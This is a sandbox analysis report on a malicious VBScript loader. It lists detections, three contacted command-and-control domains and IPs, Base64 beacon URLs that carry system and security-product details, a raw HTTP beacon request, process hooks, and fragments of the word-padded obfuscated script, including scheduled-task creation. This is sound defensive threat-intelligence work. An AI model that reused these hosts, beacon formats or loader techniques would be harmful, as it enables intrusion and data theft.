MSG_185943.vbs
This report is generated from a file or URL submitted to this webservice on March 28th 2020 07:00:11 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior: Contacts 3 domains and 3 hosts.
MITRE ATT&CK™ Techniques Detection
Additional Context
Related Sandbox Artifacts
- Associated SHA256s: 582337fe47cd15cae363596644dbea643a871a6b648b77549d610f72e544fb43
Indicators
Not all malicious and suspicious indicators are displayed.

Malicious Indicators (5)

External Systems

Detected Suricata Alert
- details
- Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
- source: Suricata Alerts
- relevance: 10/10

Sample was identified as malicious by at least one Antivirus engine
- details
- 9/59 Antivirus vendors marked sample as malicious (15% detection rate)
- source: External System
- relevance: 8/10

Network Related

Malicious artifacts seen in the context of a contacted host
- details
Found malicious artifacts related to "160.153.128.4": ...
URL: http://cheron.co.uk/ (AV positives: 4/76 scanned on 03/27/2020 18:59:48)
URL: http://cheron.co.uk/location/444444.png?uid=vwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgatadyalaaxacwamab8aeiaaqb0agqazqbmaguabgbkaguacgagaeeabgb0agkadgbpahiadqbzac0anaasadeamaasadaafabnagkaywbyag8acwbvagyadaagafcaaqbuagqabwb3ahmaiaaxadaaiabgageabqbpagwabablaa== (AV positives: 4/76 scanned on 03/27/2020 15:42:30)
URL: http://cheron.co.uk/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAARQBtAGIAZQBkAGQAZQBkACAAUwB0AGEAbgBkAGEAcgBkACAA (AV positives: 6/76 scanned on 03/27/2020 10:36:37)
URL: http://cheron.co.uk/location/444444.png?uid=VAByAGUAbgBkACAATQBpAGMAcgBvACAAUwBlAGMAdQByAGkAdAB5ACAAQQBnAGUAbgB0AC0ANAAsADEAMAAsADAAfABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAC0ANgAsADEALAAwAHwATQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAAMQAwACAAUAByAG8A (AV positives: 5/76 scanned on 03/27/2020 01:47:41)
URL: http://cheron.co.uk/location/444444.pnguid=tqbpagmacgbvahmabwbmahqaiabxagkabgbkag8adwbzacaanwagafaacgbvagyazqbzahmaaqbvag4ayqbsacaa (AV positives: 4/76 scanned on 03/26/2020 21:37:36)
File SHA256: a8d0d7910d2d9e22ea623c21cde7a858417d2785154648b09211d86b63828361 (Date: 03/27/2020 09:53:10)
File SHA256: 864deeb60830ce05f1be347929f4a8dbd135037139e34d9b08cd7ed9a0fb5030 (Date: 03/25/2020 18:20:56)
File SHA256: c6f72b8cea65c1c5130c6f2617641ae1a86107b63f17632f528a46252d118537 (Date: 03/25/2020 18:14:47)
File SHA256: b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709 (Date: 03/25/2020 17:25:52)
File SHA256: f25ae8e60b3c41f9bb27b389a3e12561ec30b392ca1cfae13c0560dc7784d801 (Date: 03/25/2020 11:35:48)
File SHA256: cdc8b52c9402b72ef9c698027c0d2ea63058ed98b832a31d3ac57c9e7f8b35ed (AV positives: 1/74 scanned on 01/16/2020 11:24:19)
File SHA256: 3c1eb194a1b0c07b536d55b52f5ddbb4428c889b5c10d285f90dd4f361479ad6 (AV positives: 28/72 scanned on 11/07/2019 16:42:47)
File SHA256: 9e59350f7fe3283a0db299e18482eb25222592344e98ac44d7ee4fabe6caf791 (AV positives: 3/72 scanned on 09/20/2019 17:33:52)
File SHA256: eb2f5dbb680d9534ac5687d5aeb3a65de1e94c88ca440cffd7cbe16ed79e7cfa (AV positives: 8/71 scanned on 09/04/2019 06:06:32)
File SHA256: d5de1604b1a16db2169fd6dbede7d49490f0fca31aae69de2f17d00372911975 (AV positives: 6/72 scanned on 08/20/2019 04:12:15)
Found malicious artifacts related to "160.153.129.23": ...
URL: http://gabinetedepsicologia.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAARQBtAGIAZQBkAGQAZQBkACAAUwB0AGEAbgBkAGEAcgBkACAA (AV positives: 3/76 scanned on 03/27/2020 10:36:37)
URL: http://facebook.klantenservicebelgie.com/ (AV positives: 3/76 scanned on 03/26/2020 23:25:49)
URL: http://outlook.klantenservicebelgie.com/contact.html (AV positives: 3/76 scanned on 03/26/2020 23:10:19)
URL: http://gabinetedepsicologia.com/location/444444.png?uid=vwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgatadyalaaxacwamab8ae0aaqbjahiabwbzag8azgb0acaavwbpag4azabvahcacwagadeamaagafaacgbv (AV positives: 3/76 scanned on 03/26/2020 04:33:04)
URL: http://gabinetedepsicologia.com/location (AV positives: 1/76 scanned on 03/25/2020 20:29:00)
File SHA256: a8d0d7910d2d9e22ea623c21cde7a858417d2785154648b09211d86b63828361 (Date: 03/27/2020 09:53:10)
File SHA256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3 (AV positives: 1/75 scanned on 03/26/2020 13:16:16)
File SHA256: 864deeb60830ce05f1be347929f4a8dbd135037139e34d9b08cd7ed9a0fb5030 (Date: 03/25/2020 18:20:56)
File SHA256: c6f72b8cea65c1c5130c6f2617641ae1a86107b63f17632f528a46252d118537 (Date: 03/25/2020 18:14:47)
File SHA256: b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709 (Date: 03/25/2020 17:25:52)
File SHA256: bd1f4befe0ccc0467a8c882405e6f86959671d413f2511e230d393ec6f3f57ab (Date: 03/25/2020 05:07:33)
File SHA256: 16ce845440c38f491f80553aee7a8144dcc0a82c46258deaffdd10a0fa3d2db2 (AV positives: 1/72 scanned on 03/03/2020 05:37:52)
File SHA256: cdc8b52c9402b72ef9c698027c0d2ea63058ed98b832a31d3ac57c9e7f8b35ed (AV positives: 1/72 scanned on 02/17/2020 11:20:40)
File SHA256: 84f1d1ffdc036768ffeba1be92362dcf619e7ce6ec27500ab47844ed24fc4230 (AV positives: 19/74 scanned on 01/29/2020 19:49:40)
File SHA256: 399c3592fbff1a1c12b4c97dc1f6720e1a3316ff33fbfa069bd7cf0fff40e606 (AV positives: 4/75 scanned on 01/29/2020 13:36:26)
Found malicious artifacts related to "23.229.248.72": ...
URL: https://clusterlacteoatlantico.com/ (AV positives: 5/76 scanned on 03/28/2020 02:42:12)
URL: http://clusterlacteoatlantico.com/location/444444.png?uid=uwbvahaaaabvahmaiabbag4adabpac0avgbpahiadqbzac0anqasadeamaasadaafabnagkaywbyag8acwbvagyadaagafcaaqbuagqabwb3ahmaiaa3acaauabyag8azgblahmacwbpag8abgbhagwaiaa= (AV positives: 7/76 scanned on 03/27/2020 15:42:39)
URL: http://clusterlacteoatlantico.com/ (AV positives: 4/76 scanned on 03/27/2020 14:51:48)
URL: http://clusterlacteoatlantico.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAARQBtAGIAZQBkAGQAZQBkACAAUwB0AGEAbgBkAGEAcgBkACAA (AV positives: 7/76 scanned on 03/27/2020 10:36:37)
URL: http://clusterlacteoatlantico.com/location/444444.png (AV positives: 6/76 scanned on 03/27/2020 01:15:55)
File SHA256: a8d0d7910d2d9e22ea623c21cde7a858417d2785154648b09211d86b63828361 (Date: 03/27/2020 09:53:10)
File SHA256: 864deeb60830ce05f1be347929f4a8dbd135037139e34d9b08cd7ed9a0fb5030 (Date: 03/25/2020 18:20:56)
File SHA256: c6f72b8cea65c1c5130c6f2617641ae1a86107b63f17632f528a46252d118537 (Date: 03/25/2020 18:14:47)
File SHA256: b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709 (Date: 03/25/2020 17:25:52)
File SHA256: cdc8b52c9402b72ef9c698027c0d2ea63058ed98b832a31d3ac57c9e7f8b35ed (AV positives: 1/69 scanned on 02/04/2019 12:42:22)
File SHA256: 17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8 (AV positives: 1/56 scanned on 03/21/2018 16:46:52)
File SHA256: 43271db404383b3cb6bc652a450a14e3f04cff2c7014ef3321a7afb2570f75cd (AV positives: 19/60 scanned on 11/03/2017 07:03:17)
File SHA256: 9c6ef4ca19918d9fb42988d0a8705ca604c7c31334592b1cab8d761d93b3900f (AV positives: 9/57 scanned on 10/05/2015 11:43:56)
- source: Network Traffic
- relevance: 10/10

Multiple malicious artifacts seen in the context of different hosts
- details
- The same artifact list for "160.153.128.4", "160.153.129.23" and "23.229.248.72" as given under "Malicious artifacts seen in the context of a contacted host" above
- source: Network Traffic
- relevance: 10/10
1 further malicious indicator is hidden from this report

Suspicious Indicators (5)

Anti-Reverse Engineering

Possibly checks for known debuggers/analysis tools
- details
"ngs depopulators mildewing metaphosphated untempested anticensoriously coworkers apple-twig 'abashlessly Perse Algarve trimellic villa-haunted isomery unshaled water-jacket smirkle nonfavorableness savours countermoves Abassin winding-sheet frocking unavenued precommercial frosty-natured uncontainableness barneys cerebrospinant smilet gawps anthropolite chob gallybagger myc hypsochromy hatchets Pareioplitae zaniness Fawnskin outdated redbaiting cnemis ignitive Mzi chronographs cutdown craked lanolines scissile pharyngoscope computerize Doricize Phalangides bathtubful absent Larussell gassings endenizen grieves large-scaled blacklists automower blue-sky pantheons habenal karyomitosis Tapa south-south-west anticonscription unimpoverished datapoint aforetimes spun-out nonbasement circumscribes secessions Cloanthus KSH reperk belt-tightening monodize unobservingly unmutually nontemperamental LISA mispracticing frangipane bretesse ashamnu apogonid urethrobulbar memos culeus gabbarts Bornstein outrecuidance Durware" (Indicator: "ntice")
"phthalmia refool jinrickshaw scopola aglisten duplexs Bascio marechale Mamertino mastheads many-mouthed 'nonuniformly decentred workship guardedly iliads superprecisely maniacs composture aromatous antiuating subendorsed hydrosorbic stone-wall supersulfureted misdoubted jube biloculine unguiculated deplaster liverberries turnoffs spumante Tamonea aglobulism supraseptal angiocholecystitis transvenom undeeded sultrier forewarns reichstaler Caprifoliaceae adventual bealing grafting Jugoslav sternoclidomastoid torsionless unspuriousness imparasitic superremuneration house-search grotesquery Cupertino powerless ogenetic Minnesota formiate terror-fleet grand-uncle relettering ballets anglicanisms doubleness Lushai hassle patulin transactionally jelliedness feminal semicursive Winnetoon bay-salt embargo purposivism lenticels necrologically contentednesses Millingtonia uniplex Sibyl paraffiny neurochemist dreamlessness monestrous flower-sucking ponderability baubles sunkie re-rejection reamers disject diminutiveness" (Indicator: "ntice")
"y spotlights desilvers albuminose nonconcur cantatrice skilder coin-operated deaminated brailing green-haired circuitable Giesser Mogadiscio Dendromecon mamboes cullis shutter dewanship humbled retesting pounded plumer cardiovascular amylophosphoric counterwill reshowed demasculinising Valladolid giddier veligerous holometabolous intrans.
'Antigonus schistomelia psoralen siderosilicosis mis-see intermedious Artamus placid Dorize Rives discharge Cadogan Taxeopoda extemporaneity palechinoid prebarbaric interminister Janine mangerite exclusionism upmix loam definitising ramosopinnate afterwitted descriptionless rewore carneous nonfeatured varas Taliesin allituric barrages endospore road-bike undesisting untuberculous Physciaceae bepepper jotted Maribelle Keble tignum tripudist nonexerciser angletwitch Sinis tiderode waddent criniculture entices Exton auspicy bolivias beryllosis spinel-red reaphook grands decerebrate cumulonimbus figboy moisture-resisting foul-handed uriniferous subjectify re-earn roommate world" (Indicator: "ntice")
"ng nonblamable fucoidal self-weighted conducingly precondylar oestroid beforetimes deep-drenched rosinweed bedabbled chipchop water-broken adelopod replotment witherweight Gronchi unrationally world-sized pinnisected sward wordbook wedelns unsnaffled catatonic repunctuating Lurex hoveled well-appearing Brendan coitus Fen schnapps fairings hemospasia savvy underspreading packinghouse schmaltziest nonleguminous Natividad IPDU Lucia double-flowered servation cooptate stoloniferously well-trussed Massmonger death-bed Leao hoin pancakes Reckford Platycercinae saggier plugdrawer leucocholy Hopfinger silicomagnesian overplied low-principled stoopball streuselkuchen Vte Archiannelida agitpropist daffle daliance bilbo threepenny lenticellate haytime rationalised sleepy-souled khitmatgar parametrizing kops featherpated spectrometries semicarbonate substantiates prestandardize maiolica" (Indicator: "ntice")
"rinsable superscouts nonobese Monarchianist colorist Hauge acoine true-false entete retinae ecol. adenylic overvarying milters twitting debuggers Kerrie cabalic Anglicisation Cummings unaccumulable beauty-beaming infrangibleness eucgia tiger-looking lobato-digitate genae arbors Mahnomen slicken Cholula built-up yapa Balearica runby 'sensately Chontaquiro potlikker titlarks automatontons Polymastigina capitle gristles anticephalalgic quoits waspnesting codifies Weiser rushy Rover unprosaic rereign superindifferently molybdenic superreformation infectors rotational wagework magnirostrate rotten-rich slanderful other-self Vas Lowville yucking Miett callbacks Donielle opiniativeness coenjoy jackscrews Zeiger streptococcal unprismatically reincluded FPU bhaiachara pinda unfrizzy asthenolith Lumpkin uncivilizing cloudburst competitors retromammary prestudying tween-deck exalters Orrick gippers mashies prescribed squirarch Moniz suppressants vamosed mermaid Jacki fuzed sea-foam half-sightedly alkalinised surg ceremo" (Indicator: "ntice")
"ann polyhedric Milroy revaccinating heredotuberculosis becometh fettstein timers shorl ryes transplendent spinnaker generatively etcetera melodramatising aristocratically meros cassideous cognise blepharitis merbaby plaustral Halopsychidae Koli apraxic ketches Archaeozoic
FHDuTKvkqOqdsGUnjCwZoTvPCWHvdbrT=Log(vexIIycwdJOsuraKdtDFAUEmvxM)'watchcry unctuously prediabetes prochronistic Caras Jussieuan someonell Renner metrodynia rejuvenated OKeeffe spike-pitcher ignominiously circumsession Hernshaw paracotoin reckling pucks lazys Asclepiadae linguists havartis pleasantry put-and-take gladiatrix wagaun sunshineless extensibility droughtiness charrs batrachophagous motley-minded enosises sequestrable townees prelicense gybes lichenology roseolas Main bright-robed lightheadedly Puncheon palmati- lenticel timeshares Ronni Northumb MVY brawlingly prediscretionary vinegarweed Sartish Papua Dominus Henn charms ultrasanguine figulines versiera band-tailed gyneocracy Jardena untranquillising consolidator eluctate leveche" (Indicator: "ntice")
- source: File/Memory
- relevance: 2/10

External Systems

Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
4/76 reputation engines marked "http://clusterlacteoatlantico.com" as malicious (5% detection rate)
4/76 reputation engines marked "http://cheron.co.uk" as malicious (5% detection rate)
- source: External System
- relevance: 10/10

Installation/Persistence

Executes a Visual Basic script
- details
- Process "wscript.exe" with commandline ""C:\MSG_185943.vbs""
- source: Monitored Target
- relevance: 10/10

Loads the task scheduler COM API
- details
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 731B0000
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 00AF0000
- source: Loaded Module
- relevance: 5/10
- ATT&CK ID: T1168

Network Related

Sends traffic on typical HTTP outbound port, but without HTTP header
- details
TCP traffic to 160.153.128.4 on port 80 is sent without HTTP header
TCP traffic to 160.153.129.23 on port 80 is sent without HTTP header
TCP traffic to 23.229.248.72 on port 80 is sent without HTTP header
- source: Network Traffic
- relevance: 5/10

Informative (11)

General

Contacts domains
- details
"cheron.co.uk"
"gabinetedepsicologia.com"
"clusterlacteoatlantico.com"
- source: Network Traffic
- relevance: 1/10

Contacts server
- details
"160.153.128.4:80"
"160.153.129.23:80"
"23.229.248.72:80"
- source: Network Traffic
- relevance: 1/10

Loads the .NET runtime environment
- details
- "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 69970000
- source: Loaded Module

Logged script engine calls
- details
"wscript.exe" called "Msxml2.DOMDocument.3.0.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.CreateObject" ...
- source: API Call
- relevance: 10/10

Overview of unique CLSIDs touched in registry
- details
"wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
"wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
"wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
"wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
"wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
"wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
"wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
"wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
"wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
"wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
"wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
"wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
"wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
"wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
"wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
"wscript.exe" touched "Microsoft OLE DB Error Collection Service" (Path: "HKCU\CLSID\{C8B522CF-5CF3-11CE-ADE5-00AA0044773D}\TREATAS")
"wscript.exe" touched "ADO 6.0" (Path: "HKCU\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\EXTENDEDERRORS")
"wscript.exe" touched "ADODB Error Lookup Service" (Path: "HKCU\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\TREATAS")
- source: Registry Access
- relevance: 3/10

Installation/Persistence

Touches files in the Windows directory
- details
"wscript.exe" touched file "%WINDIR%\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"wscript.exe" touched file "C:\Windows\System32\rsaenh.dll"
"wscript.exe" touched file "C:\Windows\System32\stdole2.tlb"
"wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
"wscript.exe" touched file "C:\Windows\System32\en-US\wscript.exe.mui"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
"wscript.exe" touched file "C:\Windows\System32\wbem\wbemdisp.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
- source: API Call
- relevance: 7/10

Network Related

Found potential URL in binary/memory
- details
Heuristic match: "cheron.co.uk"
Heuristic match: "GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: cheron.co.uk"
Heuristic match: "gabinetedepsicologia.com"
Heuristic match: "GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: gabinetedepsicologia.com"
Heuristic match: "clusterlacteoatlantico.com"
Heuristic match: "GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: clusterlacteoatlantico.com"
- source: File/Memory
- relevance: 10/10

HTTP request contains Base64 encoded artifacts
- details
- "Microsoft Windows 7 Professional "
- source: Network Traffic
- relevance: 7/10
- ATT&CK ID: T1132

Spyware/Information Retrieval

Found a reference to a known community page
- details
"ous examinationist ejurate reinfluencing chlorotically odoriferously kanoon Svantovit CONN turf-digging chutney reconfuse receivers buffering intently flow-on holsteins unforgettingly amplifier Olmito Pixley vivisectional dipsie Transjordanian croose wrabbe funambulation twittering unconjured joying seminarial phenomenist ugly-visaged apoaconitine bellwethers ASDIC short-headedness agriculture Stilesville prinkers well-kempt nonfinal unoared" (Indicator: "twitter")
"lasmic traditive careering Glendean supersacrifice missional arraignable dribblets ablatives Oden migmatite prefills repressor oscillance aromacity endermatic unsweetenedness evolutionize laryng- ectocondylar delicate-handed eventognathous nonerotically usherance pewterwort Landsturm Sibley dervishhood twitteration unidentifiedly Biondo Euclides nosing overinflation progenerative misbelief Mtbaldy emmew ooliths Gluneamie undissected Kleist uneddied haubergeon nontemptation rebooting satirically edplot crystallochemistry deliveryman mealymouthed malnutrite germlike Sapers nonfeverishness tinworks Cantor antiparallelogram proxenet twinnings feloniously bassanite Kolombangara lengther unpredictableness belay sweet-wort aplanatism undubitatively upharbor duskishly niggerish prated continuously preliteralness" (Indicator: "twitter")
"ian antiluetic pipistrel prebilling unpossessive napalm Aludra coawareness metaprescutum precomputing undispelled old-fashionedly astrogeologist well-characterized recontrolling 'spawl sticky-fingered over-cautious practicable retradition linter subelongated eaglelike albicans overexhaust top-heaviness lobbyman co-worship adular dik-dik disproportionately hero-worship doublethinking consortism toadies againward Gunnera pre-exchange suitcase Rowletts side-necked flashtester enfoncee dispromise skeiner electioneer resorptive nonvisiting paring monepiscopacy depressible vallated chastisement syllidian snowmold continuua Tobye acatamathesia world-rousing runagate unswaying patas infinitant Anti-klanism Konev Hollywood ballutes glycemia cresotic caddis cockscombed Rialto moontide Guetar glumella god-king single-tap Lide hoo-ha tooth-billed Scoto-Gaelic patibulated underplate electrifiers unjesting vindicates Magnuson freeloads gladding ecliptically exerciser heiress-ship shishya twitteration platycyrtean Kellina b" (Indicator: "twitter")
"EnrDjRmkmOWUxdNHcwGbxKjgF=QLxacsowmSIPkjKuIvGFIaJk+QLxacsowmSIPkjKuIvGFIaJk
'labiolingual solecising philotheosophical minimifidianism decencys outsprang full-celled indenture Garnerville codirect allegorize needle-and-thread hereditarian meadowlark short-spoken cyclomania implementors subscriptively crewing nonsecretories Yahganan unduped yellowishness penlites rainproofer Amuchco unsmelted B/E methemoglobinemia continua astrobotany Siberson subobliqueness Polystictus olios overcarrying promissvry circuminsession Anesidora coathangers goburra quacksalver dept. Gilles befile Mizuki twittered kodaker snary tempest-driven premodifying pazazzes taurophobe unconclusiveness cotele shovelfish opposites semiheretical reprice Pfalz interstrial suddy Algie scrimshorn pistilligerous lichen-clad bituberculate noncustodial pyoderma rainfall DCVO westernising distorting dreamboat keruing vestryhood explement Auwers Quashee infested Peltigeraceae triregnum microsurgeon senatus braseros miliolite ideologist Davies broad-m" (Indicator: "twitter")
"Set ac=td.Actions.Create(0)
'cow-eyed TEC dermato-autoplasty breathalyse Wonder Flinton unrhyming shamableness securifer talcs blastochyle meat prisonlike quadroon custard Agnatha Camptonville wreathlet self-written empiricalness nylghais such-like irregulate lagostoma ungloweringly urinemias continentality Suffr. Sageretia gangsters manbria paroled collutoria catastasis bauleah hypocotyl Fontaine newstands foregrounds mucorine countersea tetragynian kudus vineyarding Un-portuguese outwitter Tzong Hawkeyes outfasted fecklessly man-hater atelestite Strophanthus nibsome idealless appealing BUS GEIS Morez prothalline panpneumatism shikars hypercyanotic D.S.C. philocyny barkpeel carpogam breeders bi-tri- laevigate captaculum twice-dared bull-god arthrosporic sulphinate contexts UID overcorrects deep-groaning mopus bahut lockets pre-endorser ponhaws one-letter haroset direcly pyramidally close-tempered alto-relievos hightop lowdah epicycloidal hyporrhythmic suboxides Weichsel stringlike scoutings besmottered semi" (Indicator: "twitter") - source
- File/Memory
- relevance
- 7/10
-
-
System Security
-
Creates or modifies windows services
- details
- "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
"wscript.exe" wrote bytes "fae60d77e1a612772e711277ee29127785e20d776da0127726e40d77d16d1277003d1077804b107700000000ad3731758b2d3175b641317500000000" to virtual address "0x74461000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "1f4cd672" to virtual address "0x6DDE1FFC" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "c04e107720541177e0651177b53812770000000000d0737500000000c5ea73750000000088ea737500000000e9681f7582281277ee29127700000000d2691f75000000007dbb73750000000009be1f7500000000ba18737500000000" to virtual address "0x75351000" (part of module "NSI.DLL")
"wscript.exe" wrote bytes "e7390e77e1a612772e711277ee29127785e20d776da01277906411773ad5187726e40d77d16d1277003d1077804b107700000000ad3731758b2d3175b641317500000000" to virtual address "0x749C1000" (part of module "WSHIP6.DLL")
- source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179
-
File Details
MSG_185943.vbs
- Filename
- MSG_185943.vbs
- Size
- 938KiB (960877 bytes)
- Type
- script vbs
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709
- MD5
- 026625745e12a28a5e811acf5cdcc0c5
- SHA1
- ccb6c0b2f8a63e004cfa9c4a7b3b50d5300ee04b
- ssdeep
- 12288:gVrNWZIciP+yA4FnpHP3/+dXPzFs+pxo/bGY6mXuFieGOLbQbxBwiU0OcLk+:gV0hUI4xpPmd5tHoSLFienvQXwD0OL+
Hybrid Analysis
Analysed 1 process in total.
- wscript.exe "C:\MSG_185943.vbs" (PID: 4480)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
cheron.co.uk | 160.153.128.4 (TTL: 10799) | http://uk.godaddy.com; Name Server: ns75.domaincontrol.com; Creation Date: Wed, 28 Aug 2019 00:00:00 GMT | United States |
clusterlacteoatlantico.com | 23.229.248.72 (TTL: 10799) | GoDaddy.com, LLC | United States |
gabinetedepsicologia.com | 160.153.129.23 (TTL: 599) | GoDaddy.com, LLC; Name Server: NS43.DOMAINCONTROL.COM; Creation Date: Sat, 23 Nov 2002 18:43:52 GMT | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
160.153.128.4 | 80/TCP | wscript.exe (PID: 4480) | United States |
160.153.129.23 | 80/TCP | wscript.exe (PID: 4480) | United States |
23.229.248.72 | 80/TCP | wscript.exe (PID: 4480) | United States |
HTTP Traffic
Endpoint | Request | URL | Raw request |
---|---|---|---|
160.153.128.4:80 (cheron.co.uk) | GET | cheron.co.uk/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: FoxKids<br>Host: cheron.co.uk |
